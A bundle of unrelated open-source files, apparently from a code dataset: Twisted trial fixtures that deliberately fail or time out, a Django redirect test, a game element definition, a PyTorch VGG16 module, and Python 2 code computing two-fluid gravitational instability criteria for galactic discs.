# NOTE(review): these classes appear to be fixtures exercised by trial's own
# test suite — the deliberate failures, skips and never-firing Deferreds are
# intentional and must not be "fixed".

from __future__ import division, absolute_import

from twisted.trial import unittest
from twisted.internet import defer, threads, reactor
from twisted.trial.util import suppress as SUPPRESS
from twisted.python.util import runWithWarningsSuppressed


class DeferredSetUpOK(unittest.TestCase):
    # setUp returns an already-fired Deferred; the test then runs normally.
    def setUp(self):
        d = defer.succeed('value')
        d.addCallback(self._cb_setUpCalled)
        return d

    def _cb_setUpCalled(self, ignored):
        self._setUpCalled = True

    def test_ok(self):
        self.assertTrue(self._setUpCalled)


class DeferredSetUpFail(unittest.TestCase):
    # setUp fails, so test_ok must never run; testCalled records whether it did.
    testCalled = False

    def setUp(self):
        return defer.fail(unittest.FailTest('i fail'))

    def test_ok(self):
        DeferredSetUpFail.testCalled = True
        self.fail("I should not get called")


class DeferredSetUpCallbackFail(unittest.TestCase):
    testCalled = False

    def setUp(self):
        d = defer.succeed('value')
        d.addCallback(self._cb_setUpCalled)
        return d

    def _cb_setUpCalled(self, ignored):
        self.fail('deliberate failure')

    def test_ok(self):
        DeferredSetUpCallbackFail.testCalled = True


class DeferredSetUpError(unittest.TestCase):
    testCalled = False

    def setUp(self):
        return defer.fail(RuntimeError('deliberate error'))

    def test_ok(self):
        DeferredSetUpError.testCalled = True


class DeferredSetUpNeverFire(unittest.TestCase):
    testCalled = False

    def setUp(self):
        # Never fires: the harness is expected to time this out.
        return defer.Deferred()

    def test_ok(self):
        DeferredSetUpNeverFire.testCalled = True


class DeferredSetUpSkip(unittest.TestCase):
    testCalled = False

    def setUp(self):
        d = defer.succeed('value')
        d.addCallback(self._cb1)
        return d

    def _cb1(self, ignored):
        raise unittest.SkipTest("skip me")

    def test_ok(self):
        DeferredSetUpSkip.testCalled = True


class DeferredTests(unittest.TestCase):
    # Fixtures covering every Deferred outcome a test method can produce.
    touched = False

    def _cb_fail(self, reason):
        self.fail(reason)

    def _cb_error(self, reason):
        raise RuntimeError(reason)

    def _cb_skip(self, reason):
        raise unittest.SkipTest(reason)

    def _touchClass(self, ignored):
        self.__class__.touched = True

    def setUp(self):
        self.__class__.touched = False

    def test_pass(self):
        return defer.succeed('success')

    def test_passGenerated(self):
        self._touchClass(None)
        yield None
    # deferredGenerator is deprecated; suppress its warning when wrapping.
    test_passGenerated = runWithWarningsSuppressed(
        [ SUPPRESS(message="twisted.internet.defer.deferredGenerator was "
                           "deprecated") ],
        defer.deferredGenerator, test_passGenerated)

    @defer.inlineCallbacks
    def test_passInlineCallbacks(self):
        """
        Test case that is decorated with L{defer.inlineCallbacks}.
        """
        self._touchClass(None)
        yield None

    def test_fail(self):
        return defer.fail(self.failureException('I fail'))

    def test_failureInCallback(self):
        d = defer.succeed('fail')
        d.addCallback(self._cb_fail)
        return d

    def test_errorInCallback(self):
        d = defer.succeed('error')
        d.addCallback(self._cb_error)
        return d

    def test_skip(self):
        d = defer.succeed('skip')
        d.addCallback(self._cb_skip)
        d.addCallback(self._touchClass)
        return d

    def test_thread(self):
        return threads.deferToThread(lambda : None)

    def test_expectedFailure(self):
        d = defer.succeed('todo')
        d.addCallback(self._cb_error)
        return d
    test_expectedFailure.todo = "Expected failure"


class TimeoutTests(unittest.TestCase):
    # Fixtures for trial's per-test timeout handling.
    timedOut = None

    def test_pass(self):
        d = defer.Deferred()
        reactor.callLater(0, d.callback, 'hoorj!')
        return d
    test_pass.timeout = 2

    def test_passDefault(self):
        # test default timeout
        d = defer.Deferred()
        reactor.callLater(0, d.callback, 'hoorj!')
        return d

    def test_timeout(self):
        return defer.Deferred()
    test_timeout.timeout = 0.1

    def test_timeoutZero(self):
        return defer.Deferred()
    test_timeoutZero.timeout = 0

    def test_expectedFailure(self):
        return defer.Deferred()
    test_expectedFailure.timeout = 0.1
    test_expectedFailure.todo = "i will get it right, eventually"

    def test_skip(self):
        return defer.Deferred()
    test_skip.timeout = 0.1
    test_skip.skip = "i will get it right, eventually"

    def test_errorPropagation(self):
        # Record the timeout failure so the outer suite can inspect it.
        def timedOut(err):
            self.__class__.timedOut = err
            return err
        d = defer.Deferred()
        d.addErrback(timedOut)
        return d
    test_errorPropagation.timeout = 0.1

    def test_calledButNeverCallback(self):
        d = defer.Deferred()
        def neverFire(r):
            return defer.Deferred()
        d.addCallback(neverFire)
        d.callback(1)
        return d
    test_calledButNeverCallback.timeout = 0.1


class TestClassTimeoutAttribute(unittest.TestCase):
    # A class-level timeout applies to every test method in the class.
    timeout = 0.2

    def setUp(self):
        self.d = defer.Deferred()

    def testMethod(self):
        self.methodCalled = True
        return self.d
duqiao/django
refs/heads/master
tests/view_tests/tests/test_specials.py
330
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.test import SimpleTestCase, override_settings @override_settings(ROOT_URLCONF='view_tests.generic_urls') class URLHandling(SimpleTestCase): """ Tests for URL handling in views and responses. """ redirect_target = "/%E4%B8%AD%E6%96%87/target/" def test_nonascii_redirect(self): """ Tests that a non-ASCII argument to HttpRedirect is handled properly. """ response = self.client.get('/nonascii_redirect/') self.assertRedirects(response, self.redirect_target) def test_permanent_nonascii_redirect(self): """ Tests that a non-ASCII argument to HttpPermanentRedirect is handled properly. """ response = self.client.get('/permanent_nonascii_redirect/') self.assertRedirects(response, self.redirect_target, status_code=301)
alisonbnt/watchtower
refs/heads/master
tower/elements/fire.py
1
# Static definition of the Fire element: the items it enchants (amulets and
# potions), the stat each one affects, and its flavour text.
# NOTE(review): several description strings contain minor grammar slips
# ("it's power"); they are runtime text and are deliberately left unchanged.
exports = {
    "name": "Fire",
    "aspects": {
        "amulets": [
            {
                "item": "warrior",
                "effect": "health",
                "description": "With the fire and heat of battle, "
                               "your fouls will perish much faster"
            },
            {
                "item": "blacksmith",
                "effect": "hit",
                "description": "Fire consumes, fire molds, fire refines. "
                               "By using the fire of the forge, your attacks "
                               "will be more accurate"
            }
        ],
        "potions": [
            {
                "item": "oblivion",
                "effect": "health",
                "description": "Fire erases. Fire leave no traces. "
                               "By it's power, your enemies will burn and "
                               "no memory will remain, only ashes"
            },
            {
                "item": "rage",
                "effect": "hit",
                "description": "The fire of battle may burn all your enemies. "
                               "Raised hit ratio"
            }
        ]
    },
    # Zodiac signs associated with the fire element.
    "traces": ['aries', 'leo', 'sagittarius']
}
abhiskk/fast-neural-style
refs/heads/master
neural_style/vgg16.py
3
import torch import torch.nn as nn import torch.nn.functional as F class Vgg16(torch.nn.Module): def __init__(self): super(Vgg16, self).__init__() self.conv1_1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1) self.conv1_2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1) self.conv2_1 = nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1) self.conv2_2 = nn.Conv2d(128, 128, kernel_size=3, stride=1, padding=1) self.conv3_1 = nn.Conv2d(128, 256, kernel_size=3, stride=1, padding=1) self.conv3_2 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1) self.conv3_3 = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1) self.conv4_1 = nn.Conv2d(256, 512, kernel_size=3, stride=1, padding=1) self.conv4_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) self.conv4_3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) self.conv5_1 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) self.conv5_2 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) self.conv5_3 = nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1) def forward(self, X): h = F.relu(self.conv1_1(X)) h = F.relu(self.conv1_2(h)) relu1_2 = h h = F.max_pool2d(h, kernel_size=2, stride=2) h = F.relu(self.conv2_1(h)) h = F.relu(self.conv2_2(h)) relu2_2 = h h = F.max_pool2d(h, kernel_size=2, stride=2) h = F.relu(self.conv3_1(h)) h = F.relu(self.conv3_2(h)) h = F.relu(self.conv3_3(h)) relu3_3 = h h = F.max_pool2d(h, kernel_size=2, stride=2) h = F.relu(self.conv4_1(h)) h = F.relu(self.conv4_2(h)) h = F.relu(self.conv4_3(h)) relu4_3 = h return [relu1_2, relu2_2, relu3_3, relu4_3]
Amarchuk/2FInstability
refs/heads/master
core/instabCriteriaSolution.py
1
__author__ = 'amarch' # -*- coding: utf-8 -*- from numpy import * import matplotlib.pyplot as plt from scipy.optimize import * import scipy from scipy.special import * import math def run_once(f): def wrapper(*args, **kwargs): if not globals().has_key(str(f.__name__) + '_plot'): globals()[str(f.__name__) + '_plot'] = True return f(*args, **kwargs) return wrapper # Нахождение критерия неустойчивости в случае двухжидкостной неустойчивости с учетом конечной толщины диска (14) и # нет(13). Используются статьи Rafikov 2001 и Jog,Solomon 1984. Честно пишется аналитическая производная условия # неустойчивости, соответсвующая нужному дисперсионному уравнению, после чего производная приравнивается к нулю и # ищутся корни. Корень, дающий максимальное значение, подставляется в исходное выражение и получаем искомое Qeff. sunR = 4.42 # Звездная величина Солнца в полосе R sunI = 4.08 # Звездная величина Солнца в полосе I G = 4.32 #гравитационная постоянная в нужных еденицах sound_vel = 6 # скорость звука в газе, км/с h_disc = 1 # экспоненциальный размер диска, исправляется ниже I0_plot = False # Полином приближения и граница для эпициклической частоты. epiExpfit = poly1d([0]) epiBorder = 0 def mass_to_light(color): '''Отношение масса светимость вычисляется по калибровке из статьи Bell E. 2003 Table7. Коэффициенты берем для потока полосы R, цвет B-R.''' aR = -0.523 bR = 0.683 return power(10, aR + bR * color) def mass_to_light_Iband(color): '''Отношение масса светимость вычисляется по калибровке из статьи Bell E. 2003 Table7. 
Коэффициенты берем для потока полосы I, цвет B-R.''' aR = -0.405 bR = 0.518 return power(10, aR + bR * color) def surfaceDensityStarR(massToLight, h_disc, R, mu0_c): '''R полоса''' global I0_plot I0 = 4.255 * math.pow(10, 8 + 0.4 * (sunR - mu0_c)) if not I0_plot: print "#!!!!!!!!!!!!# I0_R = ", massToLight * I0 I0_plot = True return massToLight * I0 * math.exp(-R / h_disc) def surfaceDensityStarI(massToLight, h_disc, R, mu0_c): '''I полоса''' global I0_plot I0 = 4.255 * math.pow(10, 8 + 0.4 * (sunI - mu0_c)) if not I0_plot: print "#!!!!!!!!!!!!# I0_I = ", massToLight * I0 I0_plot = True return massToLight * I0 * math.exp(-R / h_disc) def surfaceDensityStarForTwoDiscs(massToLight, h_1, mu0_c_1, h_2, mu0_c_2, R): '''Звездная плотность в случае работы с двумя звездными дисками.''' global I0_plot I1 = 4.255 * math.pow(10, 8 + 0.4 * (sunI - mu0_c_1)) I2 = 4.255 * math.pow(10, 8 + 0.4 * (sunI - mu0_c_2)) if not I0_plot: print "#!!!!!!!!!!!!# I1 = ", massToLight * I1 print "#!!!!!!!!!!!!# I2 = ", massToLight * I2 I0_plot = True return massToLight * I1 * math.exp(-R / h_1) + massToLight * I2 * math.exp(-R / h_2) def surfaceDensityGas(path): '''Возвращяет точки, в которых есть данные по газовой плотности.''' gas_dens = open(path + '/gas_density.dat', 'r') r_g = [] gas_d = [] for line in gas_dens: if line[0] == '#': print line[:-1] else: line = filter(lambda x: x != '', line.split(" ")) r_g.append(float(line[0])) gas_d.append(1.44 * float(line[1])) # Учет молекулярного газа и гелия через фактор 1.44 gas_dens.close() return r_g, gas_d def plotSurfDens(massToLight, h_disc, mu0_c, Rmin, Rmax, step, path, surfDensFunct): r_g, gas_d = surfaceDensityGas(path) xx = arange(Rmin, Rmax, step) @run_once def plot5(): plt.figure(5) plt.plot(xx, [surfDensFunct(massToLight, h_disc, x, mu0_c) for x in xx], '-') plt.plot(r_g, gas_d, 'x', label='gas density') plt.legend() plt.xlabel("$R,\ ''$") plt.ylabel(r"$\Sigma_{s}(R),\ M_{sun}/pc^2$") plt.savefig(path + "/surfDensity.png") plot5() def 
plotSurfDensForTwoDiscs(massToLight, h_1, mu0_c_1, h_2, mu0_c_2, Rmin, Rmax, step, path): r_g, gas_d = surfaceDensityGas(path) xx = arange(Rmin, Rmax, step) @run_once def plot5(): plt.figure(5) plt.plot(xx, [surfaceDensityStarForTwoDiscs(massToLight, h_1, mu0_c_1, h_2, mu0_c_2, x) for x in xx], '-') plt.plot(r_g, gas_d, 'x', label='gas density') plt.legend() plt.xlabel("$R,\ ''$") plt.ylabel(r"$\Sigma(R),\ M_{sun}/pc^2$") plt.savefig(path + "/surfDensity.png") plot5() def epicyclicFreq_real(poly_gas, R, resolution): '''Честное вычисление эпициклической частоты на расстоянии R.''' return sqrt(2.0 * (poly_gas(R) ** 2) * (1 + R * poly_gas.deriv()(R) / poly_gas(R))) / (R * resolution / 1000) def epicyclicFreq(poly_gas, R, resolution): '''Вычисление эпициклической частоты на расстоянии R - до 1h честно, дальше приближение.''' global h_disc global epiExpfit global epiBorder if R < h_disc: return sqrt(2.0 * (poly_gas(R) ** 2) * (1 + R * poly_gas.deriv()(R) / poly_gas(R))) / (R * resolution / 1000) else: if R < epiBorder: return sqrt(2) * poly_gas(R) / (R * resolution / 1000) else: return math.exp(epiExpfit(R)) def evalEpyciclicFreq(poly_gas, r_ma, path, resolution, h): '''Записываем в глобальную переменную размер диска и рисуем эпциклические частоты.''' global h_disc global epiExpfit global epiBorder h_disc = h kappa = [epicyclicFreq_real(poly_gas, R, resolution) for R in r_ma] approx = [math.sqrt(2) * poly_gas(R) / (R * resolution / 1000) for R in r_ma] expfit = poly1d(polyfit(r_ma, map(math.log, map(abs,approx)), deg=1)) epiExpfit = expfit epiBorder = max(r_ma) used = [epicyclicFreq(poly_gas, R, resolution) for R in r_ma] expf = [math.exp(expfit(r)) for r in r_ma] @run_once def plot13(): plt.figure(13) plt.plot(r_ma, kappa, 'x', label='real') plt.plot(r_ma, approx, '.', label='approx') plt.plot(r_ma, expf, 'x', label='expfit') plt.plot(r_ma, used, '-', label='used') plt.axvline(x=h_disc, ymin=0, ymax=0.05) plt.xlabel("$R,\ ''$") plt.ylabel(r"$\kappa(R),\ km/s/kpc$") 
plt.legend() plt.savefig(path + "/epicyclic_freq.png") plot13() def Qstar(R, poly_gas, star_density, sigma, resolution): '''Вычисление безразмерного параметра Тумре для звездного диска. Зависит от плотности звезд, дисперсии скоростей и эпициклической частоты. Вычисляется по формулам на стр.4 в двухжидкостном приближении''' return epicyclicFreq(poly_gas, R, resolution) * sigma / (math.pi * G * star_density) def Qgas(R, poly_gas, gas_density, resolution): '''Вычисление безразмерного параметра Тумре для газового диска. Зависит от плотности газа и эпициклической частоты. Вычисляется по формулам на стр.4 в двухжидкостном приближении''' return epicyclicFreq(poly_gas, R, resolution) * sound_vel / (math.pi * G * gas_density) def dimlessWavenumber(k, R, sigma, poly_gas, resolution): '''Вычисление безразмерного волнового числа, где sigma - соответствующая расстоянию R дисперсия звезд.''' return k * sigma / epicyclicFreq(poly_gas, R, resolution) def findTwoFluidQeffs(r_arcs, poly_gas, gas_density, star_density, sigma, path, resolution, kmax): '''Двухжидкостная неустойчивость. Для каждого R из r_arcs строим график 1/Qeff по формуле (13), используя безразмерное волновое число. 
Затем находим максимум через решение производной и получаем значение Qeff.''' Qeffs = [] plt.figure(14) plt.xlabel(r"$\bar{k}$") plt.ylabel(r"$\frac{1}{Q_eff}$") plt.axhline(y=1) for R in r_arcs: print "#!!!!!!!!!!!!# =========================================" print "#!!!!!!!!!!!!# 2F kinetics: Compute 1/Qeff for R =", R ind = r_arcs.index(R) Qs = Qstar(R, poly_gas, star_density[ind], sigma[ind], resolution) Qg = Qgas(R, poly_gas, gas_density[ind], resolution) dimlessK = [dimlessWavenumber(k, R, sigma[ind], poly_gas, resolution) for k in arange(0.01, kmax, 0.01)] s = sound_vel / sigma[ind] print "#!!!!!!!!!!!!# Star density ", star_density[ind], " gas density ", gas_density[ind], " sigma ", sigma[ ind] print "#!!!!!!!!!!!!# Qs ", Qs, " Qg ", Qg, " s ", s, "kappa", epicyclicFreq(poly_gas, R, resolution) TFcriteria = [] root_for_max = solveDerivTwoFluidQeff(Qs, Qg, s, 0.00001, kmax) max_val = twoFluidQeff(Qs, Qg, s, root_for_max) print "#!!!!!!!!!!!!# Max 1/Qeff ", max_val, " and Qeff = ", 1 / max_val for barK in dimlessK: # Для точности используем i0e(x) = exp(-abs(x)) * i0(x) # Возможно использование асимптотики I_0(x) ~ exp(x)/sqrt(2pi*x) oneToQeff = (1 - scipy.special.i0e(barK ** 2)) * 2 / (Qs * barK) oneToQeff += 2 * s * barK / (Qg * (1 + (s * barK) ** 2)) TFcriteria.append(oneToQeff) plt.plot(dimlessK, TFcriteria, '.', label=str(R)) plt.plot(root_for_max, max_val, 'o') Qeffs.append([R, root_for_max, 1.0 / max_val]) plt.legend() plt.xlim(0, 50) plt.savefig(path + "/qeff_2F_kinem.png") return Qeffs def findTwoFluidHydroQeffs(r_arcs, poly_gas, gas_density, star_density, sigma, path, resolution, kmax): '''Двухжидкостная неустойчивость,гидродинамическое приближение. Для каждого R из r_arcs строим график 1/Qeff по формуле (9), используя безразмерное волновое число. 
Затем находим максимум через решение производной и получаем значение Qeff.''' Qeffs = [] plt.figure(18) plt.xlabel(r"$\bar{k}$") plt.ylabel(r"$\frac{1}{Q_eff}$") plt.axhline(y=1) for R in r_arcs: print "#!!!!!!!!!!!!# =========================================" print "#!!!!!!!!!!!!# Hydro 2F: Compute 1/Qeff for R =", R ind = r_arcs.index(R) Qs = Qstar(R, poly_gas, star_density[ind], sigma[ind], resolution) Qg = Qgas(R, poly_gas, gas_density[ind], resolution) dimlessK = [dimlessWavenumber(k, R, sigma[ind], poly_gas, resolution) for k in arange(0.01, kmax, 0.01)] s = sound_vel / sigma[ind] print "#!!!!!!!!!!!!# Star density ", star_density[ind], " gas density ", gas_density[ind], " sigma ", sigma[ ind] print "#!!!!!!!!!!!!# Qs ", Qs, " Qg ", Qg, " s ", s, "kappa", epicyclicFreq(poly_gas, R, resolution) TFcriteria = [] root_for_max = solveDerivTwoFluidHydroQeff(Qs, Qg, s, 0.0000001, kmax) max_val = twoFluidHydroQeff(Qs, Qg, s, root_for_max) print "#!!!!!!!!!!!!# Max 1/Qeff ", max_val, " and Qeff = ", 1 / max_val for barK in dimlessK: # Для точности используем i0e(x) = exp(-abs(x)) * i0(x) # Возможно использование асимптотики I_0(x) ~ exp(x)/sqrt(2pi*x) oneToQeff = (2 * barK) / (Qs * (1 + barK ** 2)) oneToQeff += 2 * s * barK / (Qg * (1 + (s * barK) ** 2)) TFcriteria.append(oneToQeff) plt.plot(dimlessK, TFcriteria, '.', label=str(R)) plt.plot(root_for_max, max_val, 'o') Qeffs.append([R, root_for_max, 1.0 / max_val]) plt.legend() plt.xlim(0, 50) plt.savefig(path + "/qeff_2F_hydro.png") return Qeffs def zGas(surfDensStar, surfDensGas, resolution): '''Вычисление вертикального масштаба газового диска в угловых секундах.''' Gz = 0.00432 # гравитационная постоянная в нужных единицах return (sound_vel ** 2) / (math.pi * Gz * ( surfDensStar + surfDensGas)) / resolution def zStar(surfDensStar, surfDensGas, resolution, sigmaZ): '''Вычисление вертикального масштаба звездного диска в угловых секундах.''' Gz = 0.00432 # гравитационная постоянная в нужных единицах return (sigmaZ ** 
2) / (math.pi * Gz * (surfDensStar + surfDensGas)) / resolution def plotVerticalScale(surfDensStar, surfDensGas, resolution, sigmaZ, r_ma, path): '''Рисуем картинку с вертикальным масштабом вдоль оси галактики.''' hzGas = [zGas(R[1], R[2], resolution) / 2 for R in zip(r_ma, surfDensStar, surfDensGas)] hzStar = [zStar(R[1], R[2], resolution, R[3]) / 2 for R in zip(r_ma, surfDensStar, surfDensGas, sigmaZ)] @run_once def plot17(): plt.figure(17) plt.xlabel(r"$R,''$") plt.ylabel(r"$h, ''$") plt.plot(r_ma, hzGas, 'o-', label='$h_z^g$') mamamax = max(hzStar) if mamamax > 200: plt.ylim(0,200) else: plt.ylim(0, mamamax) plt.plot(r_ma, hzStar, 'o-', label='$h_z^s$') plt.legend(loc='upper left') plt.ylim(-1) plt.savefig(path + "/vert_scale.png") plot17() def findTwoFluidWithDiscQeffs(r_arcs, poly_gas, gas_density, star_density, sigma, path, resolution, hzStar, hzGas, kmax): '''Двухжидкостный с диском. Для каждого R из r_arcs строим график 1/Qeff по формуле (14) измененной в кинематическое приближение и учитывая конечную толщину диска. 
Затем находим максимум через решение производной и получаем значение Qeff для каждого R.''' Qeffs = [] plt.figure(15) plt.xlabel(r"$\bar{k}$") plt.ylabel(r"$\frac{1}{Q_eff}$") plt.axhline(y=1) for R in r_arcs: print "#!!!!!!!!!!!!# =========================================" print "#!!!!!!!!!!!!# With disc: Compute 1/Qeff for R =", R ind = r_arcs.index(R) Qs = Qstar(R, poly_gas, star_density[ind], sigma[ind], resolution) Qg = Qgas(R, poly_gas, gas_density[ind], resolution) dimlessK = [dimlessWavenumber(k, R, sigma[ind], poly_gas, resolution) for k in arange(0.01, kmax, 0.01)] s = sound_vel / sigma[ind] print "#!!!!!!!!!!!!# Star density ", star_density[ind], " gas density ", gas_density[ind], " sigma ", sigma[ ind] print "#!!!!!!!!!!!!# Qs ", Qs, " Qg ", Qg, " s ", s, "kappa", epicyclicFreq(poly_gas, R, resolution), " hS ", hzStar[ind], " hG ", hzGas[ind] TFcriteria = [] root_for_max = solveDerivTwoFluidWithDiscQeff(Qs, Qg, s, hzStar[ind], hzGas[ind], epicyclicFreq(poly_gas, R, resolution), sigma[ind], 0.00001, kmax) if root_for_max == -1: krange = arange(0,kmax,0.1) original = [twoFluidWithDiscQeffs(Qs, Qg, s, hzStar[ind], hzGas[ind], epicyclicFreq(poly_gas, R, resolution), sigma[ind], x) for x in krange] root_for_max = krange[original.index(max(original))] max_val = twoFluidWithDiscQeffs(Qs, Qg, s, hzStar[ind], hzGas[ind], epicyclicFreq(poly_gas, R, resolution), sigma[ind], root_for_max) print "#!!!!!!!!!!!!# Max 1/Qeff ", max_val, " and Qeff = ", 1 / max_val for barK in dimlessK: k = barK * epicyclicFreq(poly_gas, R, resolution) / sigma[ind] expStarMultipl = (1 - math.exp(-hzStar[ind] * k)) / (k * hzStar[ind]) expGasMultipl = (1 - math.exp(-hzGas[ind] * k)) / (k * hzGas[ind]) # Для точности используем i0e(x) = exp(-abs(x)) * i0(x) # Возможно использование асимптотики I_0(x) ~ exp(x)/sqrt(2pi*x) oneToQeff = expStarMultipl * (1 - scipy.special.i0e(barK ** 2)) * 2 / (Qs * barK) oneToQeff += expGasMultipl * 2 * s * barK / (Qg * (1 + (s * barK) ** 2)) 
TFcriteria.append(oneToQeff) plt.plot(dimlessK, TFcriteria, '.', label=str(R)) plt.plot(root_for_max, max_val, 'o') Qeffs.append([R, root_for_max, 1.0 / max_val]) plt.legend() plt.xlim(0, 50) plt.savefig(path + "/qeff_2Fwith_disc.png") return Qeffs def derivTwoFluidQeff(dimlK, Qs, Qg, s): '''Производная по \bar{k} от левой части (13) для того, чтобы найти максимум. Коррекция за ассимптотику производится с помощью встроенных функций бесселя, нормированных на exp.''' part1 = (1 - i0e(dimlK ** 2)) / (-dimlK ** 2) part2 = (2 * dimlK * i0e(dimlK ** 2) - 2 * dimlK * i1e(dimlK ** 2)) / dimlK part3 = (1 - (dimlK * s) ** 2) / (1 + (dimlK * s) ** 2) ** 2 return 2 * (part1 + part2) / Qs + 2 * s * part3 / Qg def derivTwoFluidWithDiscQeff(dimlK, Qs, Qg, s, hs, hg, kappa, sigma): '''Производная по \bar{k} от левой части модифицированного (14) для того, чтобы найти максимум. Коррекция за ассимптотику производится с помощью встроенных функций бесселя, нормированных на exp.''' part1d = (1 - i0e(dimlK ** 2)) / (-dimlK ** 2) + (2 * dimlK * i0e(dimlK ** 2) - 2 * dimlK * i1e(dimlK ** 2)) / dimlK part1d *= 2 / Qs part2 = 2 * (1 - i0e(dimlK ** 2)) / (dimlK * Qs) part3d = (1 - (dimlK * s) ** 2) / (1 + (dimlK * s) ** 2) ** 2 part3d *= 2 * s / Qg part4 = 2 * s * dimlK / (1 + (dimlK * s) ** 2) / Qg exp1s = (1 - math.exp(-dimlK * kappa * hs / sigma)) / (dimlK * kappa * hs / sigma) exp1g = (1 - math.exp(-dimlK * kappa * hg / sigma)) / (dimlK * kappa * hg / sigma) eds = math.exp(-dimlK * kappa * hs / sigma) / dimlK - (1 - math.exp(-dimlK * kappa * hs / sigma)) / ( (dimlK ** 2) * kappa * hs / sigma) edg = math.exp(-dimlK * kappa * hg / sigma) / dimlK - (1 - math.exp(-dimlK * kappa * hg / sigma)) / ( (dimlK ** 2) * kappa * hg / sigma) return part2 * eds + part1d * exp1s + part4 * edg + part3d * exp1g def solveDerivTwoFluidQeff(Qs, Qg, s, eps, kmax): '''Решение уравнения deriv(13) = 0 для нахождения максимума исходной функции. 
Запускается brentq на исходной сетке, в случае если на концах сетки разные знаки функции (промежуток содержит корень), затем выбираются лучшие корни, после чего ищется, какой их них дает максимум. Возвращается только этот корень.''' grid = arange(0.1, kmax, kmax / 100) args = [Qs, Qg, s] signs = [derivTwoFluidQeff(x, *args) for x in grid] signs = map(lambda x: x / abs(x), signs) roots = [] for i in range(0, signs.__len__() - 1): if signs[i] * signs[i + 1] < 0: roots.append(brentq(lambda x: derivTwoFluidQeff(x, *args), grid[i], grid[i + 1], xtol=eps)) original = [twoFluidQeff(Qs, Qg, s, x) for x in roots] return roots[original.index(max(original))] def solveDerivTwoFluidHydroQeff(Qs, Qg, s, eps, kmax): '''Решение уравнения deriv(9) = 0 для нахождения максимума исходной функции. Запускается brentq на исходной сетке, в случае если на концах сетки разные знаки функции (промежуток содержит корень), затем выбираются лучшие корни, после чего ищется, какой их них дает максимум. Возвращается только этот корень.''' grid = arange(0.1, kmax, kmax / 100) args = [Qs, Qg, s] signs = [derivTwoFluidHydroQeff(x, *args) for x in grid] signs = map(lambda x: x / abs(x), signs) roots = [] for i in range(0, signs.__len__() - 1): if signs[i] * signs[i + 1] < 0: roots.append(brentq(lambda x: derivTwoFluidHydroQeff(x, *args), grid[i], grid[i + 1], xtol=eps)) original = [twoFluidHydroQeff(Qs, Qg, s, x) for x in roots] return roots[original.index(max(original))] def derivTwoFluidHydroQeff(dimlK, Qs, Qg, s): '''Производная по \bar{k} от левой части (9) для того, чтобы найти максимум. 
Коррекция за ассимптотику производится с помощью встроенных функций бесселя, нормированных на exp.''' part1 = (1 - dimlK ** 2) / (1 + dimlK ** 2) ** 2 part3 = (1 - (dimlK * s) ** 2) / (1 + (dimlK * s) ** 2) ** 2 return (2 * part1 / Qs) + (2 * s * part3 / Qg) def twoFluidQeff(Qs, Qg, s, dimlK): '''Возвращает соcчитанное значение (13).''' return (1 - i0e(dimlK ** 2)) * 2 / (Qs * dimlK) + 2 * s * dimlK / (Qg * (1 + (s * dimlK) ** 2)) def twoFluidHydroQeff(Qs, Qg, s, dimlK): '''Возвращает соcчитанное значение (9).''' return 2 * dimlK / (Qs * (1 + dimlK ** 2)) + 2 * s * dimlK / (Qg * (1 + (s * dimlK) ** 2)) def twoFluidWithDiscQeffs(Qs, Qg, s, hs, hg, kappa, sigma, dimlK): '''Возвращает соcчитанное значение (14).''' k = dimlK * kappa / sigma expStarMultipl = (1 - math.exp(-hs * k)) / (k * hs) expGasMultipl = (1 - math.exp(-hg * k)) / (k * hg) oneToQeff = expStarMultipl * (1 - scipy.special.i0e(dimlK ** 2)) * 2 / (Qs * dimlK) oneToQeff += expGasMultipl * 2 * s * dimlK / (Qg * (1 + (s * dimlK) ** 2)) return oneToQeff def solveDerivTwoFluidWithDiscQeff(Qs, Qg, s, hs, hg, kappa, sigma, eps, kmax): '''Решение уравнения deriv(14) = 0 для нахождения максимума исходной функции. Запускается brentq на исходной сетке, в случае если на концах сетки разные знаки функции (промежуток содержит корень), затем выбираются лучшие корни, после чего ищется, какой их них дает максимум. 
Возвращается только этот корень.''' grid = arange(0.1, kmax, kmax / 100) args = [Qs, Qg, s, hs, hg, kappa, sigma] signs = [derivTwoFluidWithDiscQeff(x, *args) for x in grid] signs = map(lambda x: x / abs(x), signs) roots = [] for i in range(0, signs.__len__() - 1): if signs[i] * signs[i + 1] < 0: roots.append(brentq(lambda x: derivTwoFluidWithDiscQeff(x, *args), grid[i], grid[i + 1], xtol=eps)) original = [twoFluidWithDiscQeffs(Qs, Qg, s, hs, hg, kappa, sigma, x) for x in roots] if original.__len__() > 0: return roots[original.index(max(original))] else: return -1 def findOneFluidQeffs(r_arcs, poly_gas, gas_density, star_density, sigma, path, resolution, kmax): '''Для каждого R из r_arcs строим график 1/Qeff для критерия Тумре (4), используя безразмерное волновое число. Затем находим максимум через решение производной и получаем значение Qeff.''' Qeffs = [] plt.figure(16) plt.xlabel(r"$R,''$") plt.ylabel(r"$\frac{1}{Q_eff}$") plt.axhline(y=1) for R in r_arcs: print "#!!!!!!!!!!!!# =========================================" print "#!!!!!!!!!!!!# Simple one fluid : Compute 1/Qeff for R =", R ind = r_arcs.index(R) Qs = Qstar(R, poly_gas, star_density[ind], sigma[ind], resolution) Qg = Qgas(R, poly_gas, gas_density[ind], resolution) s = sound_vel / sigma[ind] print "#!!!!!!!!!!!!# Star density ", star_density[ind], " gas density ", gas_density[ind], " sigma ", sigma[ ind] print "#!!!!!!!!!!!!# Qs ", Qs, " Qg ", Qg, " s ", s, "kappa", epicyclicFreq(poly_gas, R, resolution) Qeffs.append(Qg) plt.plot(r_arcs, map(lambda x: 1 / x, Qeffs), '-') plt.legend() plt.xlim(-10, 300) plt.savefig(path + "/qeff_1F.png") return Qeffs